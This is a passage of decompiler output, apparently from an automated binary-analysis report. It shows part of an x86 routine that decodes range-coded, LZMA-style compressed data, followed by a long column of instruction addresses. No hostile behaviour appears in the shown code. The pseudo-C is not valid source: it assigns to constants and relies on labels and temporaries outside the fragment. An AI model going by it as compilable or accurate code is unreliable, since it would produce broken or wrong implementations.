                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v136 = 0xb;
                          								__esi = _v8 + 0x1c8 + _v60 * 2;
                          								goto L135;
                          							}
                          							__eax = _v44;
                          							goto L91;
                          						case 0xb:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__ecx = _v40;
                          								__eax = _v36;
                          								_v36 = _v40;
                          							} else {
                          								__eax = _v40;
                          							}
                          							__ecx = _v44;
                          							_v40 = _v44;
                          							L91:
                          							__ecx = _v48;
                          							_v48 = __eax;
                          							_v44 = _v48;
                          							L92:
                          							__eax = _v8;
                          							_v132 = 0x15;
                          							__eax = _v8 + 0xa68;
                          							_v92 = _v8 + 0xa68;
                          							goto L71;
                          						case 0xc:
                          							L102:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xc;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t340 =  &_v116;
                          							 *_t340 = _v116 + 1;
                          							__eflags =  *_t340;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							__eax = _v48;
                          							goto L104;
                          						case 0xd:
                          							L39:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xd;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t127 =  &_v116;
                          							 *_t127 = _v116 + 1;
                          							__eflags =  *_t127;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L41:
                          							__eax = _v68;
                          							__eflags = _v76 - _v68;
                          							if(_v76 != _v68) {
                          								goto L50;
                          							}
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								goto L56;
                          							}
                          							L43:
                          							__eax = _v95 & 0x000000ff;
                          							_v95 = _v95 << 1;
                          							__ecx = _v92;
                          							__eax = (_v95 & 0x000000ff) >> 7;
                          							_v76 = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi = _v92 + __eax * 2;
                          							_v20 = _v20 >> 0xb;
                          							__ax =  *__esi;
                          							_v88 = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edx;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								_v68 = 1;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								_v68 = _v68 & 0x00000000;
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							_v72 = __ebx;
                          							if(_v20 >= 0x1000000) {
                          								goto L41;
                          							} else {
                          								goto L39;
                          							}
                          						case 0xe:
                          							L48:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xe;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t161 =  &_v116;
                          							 *_t161 = _v116 + 1;
                          							__eflags =  *_t161;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							while(1) {
                          								L50:
                          								__eflags = __ebx - 0x100;
                          								if(__ebx >= 0x100) {
                          									break;
                          								}
                          								__eax = _v92;
                          								__edx = __ebx + __ebx;
                          								__ecx = _v20;
                          								__esi = __edx + __eax;
                          								__ecx = _v20 >> 0xb;
                          								__ax =  *__esi;
                          								_v88 = __esi;
                          								__edi = __ax & 0x0000ffff;
                          								__ecx = (_v20 >> 0xb) * __edi;
                          								__eflags = _v16 - __ecx;
                          								if(_v16 >= __ecx) {
                          									_v20 = _v20 - __ecx;
                          									_v16 = _v16 - __ecx;
                          									__cx = __ax;
                          									_t175 = __edx + 1; // 0x1
                          									__ebx = _t175;
                          									__cx = __ax >> 5;
                          									__eflags = __eax;
                          									 *__esi = __ax;
                          								} else {
                          									_v20 = __ecx;
                          									0x800 = 0x800 - __edi;
                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          									__ebx = __ebx + __ebx;
                          									 *__esi = __cx;
                          								}
                          								__eflags = _v20 - 0x1000000;
                          								_v72 = __ebx;
                          								if(_v20 >= 0x1000000) {
                          									continue;
                          								} else {
                          									goto L48;
                          								}
                          							}
                          							L56:
                          							_t178 =  &_v56;
                          							 *_t178 = _v56 & 0x00000000;
                          							__eflags =  *_t178;
                          							goto L57;
                          						case 0xf:
                          							L60:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xf;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t208 =  &_v116;
                          							 *_t208 = _v116 + 1;
                          							__eflags =  *_t208;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L62:
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								L57:
                          								__al = _v72;
                          								_v96 = _v72;
                          								goto L58;
                          							}
                          							L63:
                          							__eax = _v92;
                          							__edx = __ebx + __ebx;
                          							__ecx = _v20;
                          							__esi = __edx + __eax;
                          							__ecx = _v20 >> 0xb;
                          							__ax =  *__esi;
                          							_v88 = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edi;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								_t222 = __edx + 1; // 0x1
                          								__ebx = _t222;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								 *__esi = __ax;
                          							} else {
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							_v72 = __ebx;
                          							if(_v20 >= 0x1000000) {
                          								goto L62;
                          							} else {
                          								goto L60;
                          							}
                          						case 0x10:
                          							L112:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0x10;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t371 =  &_v116;
                          							 *_t371 = _v116 + 1;
                          							__eflags =  *_t371;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							goto L114;
                          						case 0x11:
                          							L71:
                          							__esi = _v92;
                          							_v136 = 0x12;
                          							goto L135;
                          						case 0x12:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v92;
                          								_v136 = 0x13;
                          								__esi = _v92 + 2;
                          								L135:
                          								_v88 = _t626;
                          								goto L136;
                          							}
                          							__eax = _v80;
                          							_v52 = _v52 & 0x00000000;
                          							__ecx = _v92;
                          							__eax = _v80 << 4;
                          							__eflags = __eax;
                          							__eax = _v92 + __eax + 4;
                          							goto L133;
                          						case 0x13:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								_t475 =  &_v92;
                          								 *_t475 = _v92 + 0x204;
                          								__eflags =  *_t475;
                          								_v52 = 0x10;
                          								_v68 = 8;
                          								L147:
                          								_v128 = 0x14;
                          								goto L148;
                          							}
                          							__eax = _v80;
                          							__ecx = _v92;
                          							__eax = _v80 << 4;
                          							_v52 = 8;
                          							__eax = _v92 + (_v80 << 4) + 0x104;
                          							L133:
                          							_v92 = __eax;
                          							_v68 = 3;
                          							goto L147;
                          						case 0x14:
                          							_v52 = _v52 + __ebx;
                          							__eax = _v132;
                          							goto L143;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags = _v60 - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							_v60 = (__eflags >= 0) - 1 + 0xb;
                          							goto L123;
                          						case 0x16:
                          							__eax = _v52;
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx = _v8;
                          							_v68 = 6;
                          							__eax = __eax << 7;
                          							_v128 = 0x19;
                          							_v92 = __eax;
                          							goto L148;
                          						case 0x17:
                          							L148:
                          							__eax = _v68;
                          							_v84 = 1;
                          							_v76 = _v68;
                          							goto L152;
                          						case 0x18:
                          							L149:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0x18;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t490 =  &_v116;
                          							 *_t490 = _v116 + 1;
                          							__eflags =  *_t490;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L151:
                          							_t493 =  &_v76;
                          							 *_t493 = _v76 - 1;
                          							__eflags =  *_t493;
                          							L152:
                          							__eflags = _v76;
                          							if(_v76 <= 0) {
                          								__ecx = _v68;
                          								__ebx = _v84;
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx = _v84 - (1 << __cl);
                          								__eax = _v128;
                          								_v72 = __ebx;
                          								L143:
                          								_v140 = _t561;
                          								goto L3;
                          							}
                          							__eax = _v84;
                          							_v20 = _v20 >> 0xb;
                          							__edx = _v84 + _v84;
                          							__eax = _v92;
                          							__esi = __edx + __eax;
                          							_v88 = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edi;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								_v84 = __edx;
                          							} else {
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								_v84 = _v84 << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							if(_v20 >= 0x1000000) {
                          								goto L151;
                          							} else {
                          								goto L149;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								_v48 = __ebx;
                          								L122:
                          								_t399 =  &_v48;
                          								 *_t399 = _v48 + 1;
                          								__eflags =  *_t399;
                          								L123:
                          								__eax = _v48;
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									_v52 = _v52 | 0xffffffff;
                          									goto L173;
                          								}
                          								__eflags = __eax - _v100;
                          								if(__eax > _v100) {
                          									goto L174;
                          								}
                          								_v52 = _v52 + 2;
                          								__eax = _v52;
                          								_t406 =  &_v100;
                          								 *_t406 = _v100 + _v52;
                          								__eflags =  *_t406;
                          								goto L126;
                          							}
                          							__ecx = __ebx;
                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							_v48 = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								_v76 = __ecx;
                          								L105:
                          								__eflags = _v76;
                          								if(_v76 <= 0) {
                          									__eax = __eax + __ebx;
                          									_v68 = 4;
                          									_v48 = __eax;
                          									__eax = _v8;
                          									__eax = _v8 + 0x644;
                          									__eflags = __eax;
                          									L111:
                          									__ebx = 0;
                          									_v92 = __eax;
                          									_v84 = 1;
                          									_v72 = 0;
                          									_v76 = 0;
                          									L115:
                          									__eax = _v68;
                          									__eflags = _v76 - _v68;
                          									if(_v76 >= _v68) {
                          										_t397 =  &_v48;
                          										 *_t397 = _v48 + __ebx;
                          										__eflags =  *_t397;
                          										goto L122;
                          									}
                          									__eax = _v84;
                          									_v20 = _v20 >> 0xb;
                          									__edi = _v84 + _v84;
                          									__eax = _v92;
                          									__esi = __edi + __eax;
                          									_v88 = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = (_v20 >> 0xb) * __ecx;
                          									__eflags = _v16 - __edx;
                          									if(_v16 >= __edx) {
                          										__ecx = 0;
                          										_v20 = _v20 - __edx;
                          										__ecx = 1;
                          										_v16 = _v16 - __edx;
                          										__ebx = 1;
                          										__ecx = _v76;
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx = _v72;
                          										__ebx = _v72 | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										_v72 = __ebx;
                          										 *__esi = __ax;
                          										_v84 = __edi;
                          									} else {
                          										_v20 = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										_v84 = _v84 << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags = _v20 - 0x1000000;
                          									if(_v20 >= 0x1000000) {
                          										L114:
                          										_t374 =  &_v76;
                          										 *_t374 = _v76 + 1;
                          										__eflags =  *_t374;
                          										goto L115;
                          									} else {
                          										goto L112;
                          									}
                          								}
                          								__ecx = _v16;
                          								__ebx = __ebx + __ebx;
                          								_v20 = _v20 >> 1;
                          								__eflags = _v16 - _v20;
                          								_v72 = __ebx;
                          								if(_v16 >= _v20) {
                          									__ecx = _v20;
                          									_v16 = _v16 - _v20;
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									_v72 = __ebx;
                          								}
                          								__eflags = _v20 - 0x1000000;
                          								if(_v20 >= 0x1000000) {
                          									L104:
                          									_t344 =  &_v76;
                          									 *_t344 = _v76 - 1;
                          									__eflags =  *_t344;
                          									goto L105;
                          								} else {
                          									goto L102;
                          								}
                          							}
                          							__edx = _v8;
                          							__eax = __eax - __ebx;
                          							_v68 = __ecx;
                          							__eax = _v8 + 0x55e + __eax * 2;
                          							goto L111;
                          						case 0x1a:
                          							L58:
                          							__eflags = _v104;
                          							if(_v104 == 0) {
                          								_v140 = 0x1a;
                          								goto L173;
                          							}
                          							__ecx = _v108;
                          							__al = _v96;
                          							__edx = _v12;
                          							_v100 = _v100 + 1;
                          							_v108 = _v108 + 1;
                          							_v104 = _v104 - 1;
                          							 *_v108 = __al;
                          							__ecx = _v24;
                          							 *(_v12 + __ecx) = __al;
                          							__eax = __ecx + 1;
                          							__edx = 0;
                          							_t197 = __eax % _v120;
                          							__eax = __eax / _v120;
                          							__edx = _t197;
                          							goto L82;
                          						case 0x1b:
                          							L78:
                          							__eflags = _v104;
                          							if(_v104 == 0) {
                          								_v140 = 0x1b;
                          								goto L173;
                          							}
                          							__eax = _v24;
                          							__eax = _v24 - _v48;
                          							__eflags = __eax - _v120;
                          							if(__eax >= _v120) {
                          								__eax = __eax + _v120;
                          								__eflags = __eax;
                          							}
                          							__edx = _v12;
                          							__cl =  *(__edx + __eax);
                          							__eax = _v24;
                          							_v96 = __cl;
                          							 *(__edx + __eax) = __cl;
                          							__eax = __eax + 1;
                          							__edx = 0;
                          							_t280 = __eax % _v120;
                          							__eax = __eax / _v120;
                          							__edx = _t280;
                          							__eax = _v108;
                          							_v100 = _v100 + 1;
                          							_v108 = _v108 + 1;
                          							_t289 =  &_v104;
                          							 *_t289 = _v104 - 1;
                          							__eflags =  *_t289;
                          							 *_v108 = __cl;
                          							L82:
                          							_v24 = __edx;
                          							goto L83;
                          						case 0x1c:
                          							while(1) {
                          								L126:
                          								__eflags = _v104;
                          								if(_v104 == 0) {
                          									break;
                          								}
                          								__eax = _v24;
                          								__eax = _v24 - _v48;
                          								__eflags = __eax - _v120;
                          								if(__eax >= _v120) {
                          									__eax = __eax + _v120;
                          									__eflags = __eax;
                          								}
                          								__edx = _v12;
                          								__cl =  *(__edx + __eax);
                          								__eax = _v24;
                          								_v96 = __cl;
                          								 *(__edx + __eax) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t420 = __eax % _v120;
                          								__eax = __eax / _v120;
                          								__edx = _t420;
                          								__eax = _v108;
                          								_v108 = _v108 + 1;
                          								_v104 = _v104 - 1;
                          								_v52 = _v52 - 1;
                          								__eflags = _v52;
                          								 *_v108 = __cl;
                          								_v24 = _t420;
                          								if(_v52 > 0) {
                          									continue;
                          								} else {
                          									L83:
                          									_v140 = 2;
                          									goto L3;
                          								}
                          							}
                          							_v140 = 0x1c;
                          							L173:
                          							_push(0x22);
                          							_pop(_t574);
                          							memcpy(_v148,  &_v140, _t574 << 2);
                          							return 0;
                          					}
                          				}
                          				L174:
                          				_t538 = _t537 | 0xffffffff;
                          				return _t538;
                          			}










































                          0x00406a5f
                          0x00406a66
                          0x00406a6c
                          0x00406a72
                          0x00000000
                          0x00406a76
                          0x00406a82
                          0x00406a82
                          0x00406a82
                          0x00406a8b
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00000000
                          0x00406a98
                          0x00406a9c
                          0x00000000
                          0x00000000
                          0x00406aa5
                          0x00406aa8
                          0x00406aab
                          0x00406aad
                          0x00406aaf
                          0x00000000
                          0x00000000
                          0x00406ab5
                          0x00406ab8
                          0x00406aba
                          0x00406abb
                          0x00406abe
                          0x00406ac0
                          0x00406ac1
                          0x00406ac3
                          0x00406ac6
                          0x00406acb
                          0x00406ad0
                          0x00406ad9
                          0x00406aec
                          0x00406aef
                          0x00406af8
                          0x00406afb
                          0x00406b23
                          0x00406b23
                          0x00406b25
                          0x00406b33
                          0x00406b33
                          0x00406b37
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406b27
                          0x00406b27
                          0x00406b2a
                          0x00406b2a
                          0x00406b2b
                          0x00406b2b
                          0x00000000
                          0x00406b27
                          0x00406afd
                          0x00406b01
                          0x00406b06
                          0x00406b06
                          0x00406b0f
                          0x00406b15
                          0x00406b17
                          0x00406b1a
                          0x00000000
                          0x00406b20
                          0x00406b20
                          0x00000000
                          0x00406b20
                          0x00000000
                          0x00406b3d
                          0x00406b3d
                          0x00406b41
                          0x004073ed
                          0x00000000
                          0x004073ed
                          0x00406b4a
                          0x00406b5a
                          0x00406b5d
                          0x00406b60
                          0x00406b60
                          0x00406b60
                          0x00406b63
                          0x00406b63
                          0x00406b67
                          0x00000000
                          0x00000000
                          0x00406b69
                          0x00406b6c
                          0x00406b6f
                          0x00406b99
                          0x00406b9f
                          0x00406ba6
                          0x00000000
                          0x00406ba6
                          0x00406b71
                          0x00406b75
                          0x00406b78
                          0x00406b7d
                          0x00406b7d
                          0x00406b88
                          0x00406b8e
                          0x00406b90
                          0x00406b93
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bd8
                          0x00406bde
                          0x00406be1
                          0x00406bee
                          0x00406bf6
                          0x00000000
                          0x00000000
                          0x00406bad
                          0x00406bad
                          0x00406bb1
                          0x004073fc
                          0x00000000
                          0x004073fc
                          0x00406bbd
                          0x00406bc8
                          0x00406bc8
                          0x00406bc8
                          0x00406bcb
                          0x00406bce
                          0x00406bd1
                          0x00406bd4
                          0x00406bd6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040726d
                          0x0040726d
                          0x00407273
                          0x00407279
                          0x0040727c
                          0x0040727f
                          0x00407299
                          0x0040729c
                          0x004072a2
                          0x004072ad
                          0x004072ad
                          0x004072af
                          0x00407281
                          0x00407281
                          0x00407290
                          0x00407294
                          0x00407294
                          0x004072b2
                          0x004072b9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004072bb
                          0x004072bb
                          0x004072bf
                          0x0040746e
                          0x00000000
                          0x0040746e
                          0x004072cb
                          0x004072d2
                          0x004072da
                          0x004072da
                          0x004072da
                          0x004072dd
                          0x004072e0
                          0x004072e0
                          0x00000000
                          0x00000000
                          0x00406bfe
                          0x00406c00
                          0x00406c03
                          0x00406c74
                          0x00406c77
                          0x00406c7a
                          0x00406c81
                          0x00406c8b
                          0x00000000
                          0x00406c8b
                          0x00406c05
                          0x00406c09
                          0x00406c0c
                          0x00406c0e
                          0x00406c11
                          0x00406c14
                          0x00406c16
                          0x00406c19
                          0x00406c1b
                          0x00406c20
                          0x00406c23
                          0x00406c26
                          0x00406c2a
                          0x00406c31
                          0x00406c34
                          0x00406c3b
                          0x00406c3f
                          0x00406c47
                          0x00406c47
                          0x00406c47
                          0x00406c41
                          0x00406c41
                          0x00406c41
                          0x00406c36
                          0x00406c36
                          0x00406c36
                          0x00406c4b
                          0x00406c4e
                          0x00406c6c
                          0x00406c6e
                          0x00000000
                          0x00406c6e
                          0x00406c50
                          0x00406c53
                          0x00406c56
                          0x00406c59
                          0x00406c5b
                          0x00406c5b
                          0x00406c5b
                          0x00406c5e
                          0x00406c61
                          0x00406c63
                          0x00406c64
                          0x00406c67
                          0x00000000
                          0x00000000
                          0x00406e9d
                          0x00406ea1
                          0x00406ebf
                          0x00406ec2
                          0x00406ec9
                          0x00406ecc
                          0x00406ecf
                          0x00406ed2
                          0x00406ed5
                          0x00406ed8
                          0x00406eda
                          0x00406ee1
                          0x00406ee2
                          0x00406ee4
                          0x00406ee7
                          0x00406eea
                          0x00406eed
                          0x00406eed
                          0x00406ef2
                          0x00000000
                          0x00406ef2
                          0x00406ea3
                          0x00406ea6
                          0x00406ea9
                          0x00406eb3
                          0x00000000
                          0x00000000
                          0x00406f07
                          0x00406f0b
                          0x00406f2e
                          0x00406f31
                          0x00406f34
                          0x00406f3e
                          0x00406f0d
                          0x00406f0d
                          0x00406f10
                          0x00406f13
                          0x00406f16
                          0x00406f23
                          0x00406f26
                          0x00406f26
                          0x00000000
                          0x00000000
                          0x00406f4a
                          0x00406f4e
                          0x00000000
                          0x00000000
                          0x00406f54
                          0x00406f58
                          0x00000000
                          0x00000000
                          0x00406f5e
                          0x00406f60
                          0x00406f64
                          0x00406f64
                          0x00406f67
                          0x00406f6b
                          0x00000000
                          0x00000000
                          0x00406fbb
                          0x00406fbf
                          0x00406fc6
                          0x00406fc9
                          0x00406fcc
                          0x00406fd6
                          0x00000000
                          0x00406fd6
                          0x00406fc1
                          0x00000000
                          0x00000000
                          0x00406fe2
                          0x00406fe6
                          0x00406fed
                          0x00406ff0
                          0x00406ff3
                          0x00406fe8
                          0x00406fe8
                          0x00406fe8
                          0x00406ff6
                          0x00406ff9
                          0x00406ffc
                          0x00406ffc
                          0x00406fff
                          0x00407002
                          0x00407005
                          0x00407005
                          0x00407008
                          0x0040700f
                          0x00407014
                          0x00000000
                          0x00000000
                          0x004070a2
                          0x004070a2
                          0x004070a6
                          0x00407444
                          0x00000000
                          0x00407444
                          0x004070ac
                          0x004070af
                          0x004070b2
                          0x004070b6
                          0x004070b9
                          0x004070bf
                          0x004070c1
                          0x004070c1
                          0x004070c1
                          0x004070c4
                          0x004070c7
                          0x00000000
                          0x00000000
                          0x00406c97
                          0x00406c97
                          0x00406c9b
                          0x00407408
                          0x00000000
                          0x00407408
                          0x00406ca1
                          0x00406ca4
                          0x00406ca7
                          0x00406cab
                          0x00406cae
                          0x00406cb4
                          0x00406cb6
                          0x00406cb6
                          0x00406cb6
                          0x00406cb9
                          0x00406cbc
                          0x00406cbc
                          0x00406cbf
                          0x00406cc2
                          0x00000000
                          0x00000000
                          0x00406cc8
                          0x00406cce
                          0x00000000
                          0x00000000
                          0x00406cd4
                          0x00406cd4
                          0x00406cd8
                          0x00406cdb
                          0x00406cde
                          0x00406ce1
                          0x00406ce4
                          0x00406ce5
                          0x00406ce8
                          0x00406cea
                          0x00406cf0
                          0x00406cf3
                          0x00406cf6
                          0x00406cf9
                          0x00406cfc
                          0x00406cff
                          0x00406d02
                          0x00406d1e
                          0x00406d21
                          0x00406d24
                          0x00406d27
                          0x00406d2e
                          0x00406d32
                          0x00406d34
                          0x00406d38
                          0x00406d04
                          0x00406d04
                          0x00406d08
                          0x00406d10
                          0x00406d15
                          0x00406d17
                          0x00406d19
                          0x00406d19
                          0x00406d3b
                          0x00406d42
                          0x00406d45
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d50
                          0x00406d50
                          0x00406d54
                          0x00407414
                          0x00000000
                          0x00407414
                          0x00406d5a
                          0x00406d5d
                          0x00406d60
                          0x00406d64
                          0x00406d67
                          0x00406d6d
                          0x00406d6f
                          0x00406d6f
                          0x00406d6f
                          0x00406d72
                          0x00406d75
                          0x00406d75
                          0x00406d75
                          0x00406d7b
                          0x00000000
                          0x00000000
                          0x00406d7d
                          0x00406d80
                          0x00406d83
                          0x00406d86
                          0x00406d89
                          0x00406d8c
                          0x00406d8f
                          0x00406d92
                          0x00406d95
                          0x00406d98
                          0x00406d9b
                          0x00406db3
                          0x00406db6
                          0x00406db9
                          0x00406dbc
                          0x00406dbc
                          0x00406dbf
                          0x00406dc3
                          0x00406dc5
                          0x00406d9d
                          0x00406d9d
                          0x00406da5
                          0x00406daa
                          0x00406dac
                          0x00406dae
                          0x00406dae
                          0x00406dc8
                          0x00406dcf
                          0x00406dd2
                          0x00000000
                          0x00406dd4
                          0x00000000
                          0x00406dd4
                          0x00406dd2
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00000000
                          0x00000000
                          0x00406e14
                          0x00406e14
                          0x00406e18
                          0x00407420
                          0x00000000
                          0x00407420
                          0x00406e1e
                          0x00406e21
                          0x00406e24
                          0x00406e28
                          0x00406e2b
                          0x00406e31
                          0x00406e33
                          0x00406e33
                          0x00406e33
                          0x00406e36
                          0x00406e39
                          0x00406e39
                          0x00406e3f
                          0x00406ddd
                          0x00406ddd
                          0x00406de0
                          0x00000000
                          0x00406de0
                          0x00406e41
                          0x00406e41
                          0x00406e44
                          0x00406e47
                          0x00406e4a
                          0x00406e4d
                          0x00406e50
                          0x00406e53
                          0x00406e56
                          0x00406e59
                          0x00406e5c
                          0x00406e5f
                          0x00406e77
                          0x00406e7a
                          0x00406e7d
                          0x00406e80
                          0x00406e80
                          0x00406e83
                          0x00406e87
                          0x00406e89
                          0x00406e61
                          0x00406e61
                          0x00406e69
                          0x00406e6e
                          0x00406e70
                          0x00406e72
                          0x00406e72
                          0x00406e8c
                          0x00406e93
                          0x00406e96
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00407125
                          0x00407125
                          0x00407129
                          0x00407450
                          0x00000000
                          0x00407450
                          0x0040712f
                          0x00407132
                          0x00407135
                          0x00407139
                          0x0040713c
                          0x00407142
                          0x00407144
                          0x00407144
                          0x00407144
                          0x00407147
                          0x00000000
                          0x00000000
                          0x00406ef5
                          0x00406ef5
                          0x00406ef8
                          0x00000000
                          0x00000000
                          0x00407234
                          0x00407238
                          0x0040725a
                          0x0040725d
                          0x00407267
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x0040723a
                          0x0040723d
                          0x00407241
                          0x00407244
                          0x00407244
                          0x00407247
                          0x00000000
                          0x00000000
                          0x004072f1
                          0x004072f5
                          0x00407313
                          0x00407313
                          0x00407313
                          0x0040731a
                          0x00407321
                          0x00407328
                          0x00407328
                          0x00000000
                          0x00407328
                          0x004072f7
                          0x004072fa
                          0x004072fd
                          0x00407300
                          0x00407307
                          0x0040724b
                          0x0040724b
                          0x0040724e
                          0x00000000
                          0x00000000
                          0x004073e2
                          0x004073e5
                          0x00000000
                          0x00000000
                          0x0040701c
                          0x0040701e
                          0x00407025
                          0x00407026
                          0x00407028
                          0x0040702b
                          0x00000000
                          0x00000000
                          0x00407033
                          0x00407036
                          0x00407039
                          0x0040703b
                          0x0040703d
                          0x0040703d
                          0x0040703e
                          0x00407041
                          0x00407048
                          0x0040704b
                          0x00407059
                          0x00000000
                          0x00000000
                          0x0040732f
                          0x0040732f
                          0x00407332
                          0x00407339
                          0x00000000
                          0x00000000
                          0x0040733e
                          0x0040733e
                          0x00407342
                          0x0040747a
                          0x00000000
                          0x0040747a
                          0x00407348
                          0x0040734b
                          0x0040734e
                          0x00407352
                          0x00407355
                          0x0040735b
                          0x0040735d
                          0x0040735d
                          0x0040735d
                          0x00407360
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407366
                          0x00407366
                          0x0040736a
                          0x004073ca
                          0x004073cd
                          0x004073d2
                          0x004073d3
